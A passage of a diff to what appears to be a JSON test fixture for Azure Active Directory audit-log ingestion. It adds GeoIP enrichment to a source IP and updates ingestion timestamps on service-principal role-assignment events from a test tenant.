APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8442,6 +8970,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8608,7 +9148,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125093800Z", + "ingested": "2021-12-14T14:48:43.176695629Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -8635,6 +9175,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8801,7 +9353,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125100400Z", + "ingested": "2021-12-14T14:48:43.176697121Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -8828,6 +9380,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8994,7 +9558,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125107100Z", + "ingested": "2021-12-14T14:48:43.176697767Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9021,6 +9585,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -9187,7 +9763,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125113600Z", + "ingested": "2021-12-14T14:48:43.176698549Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
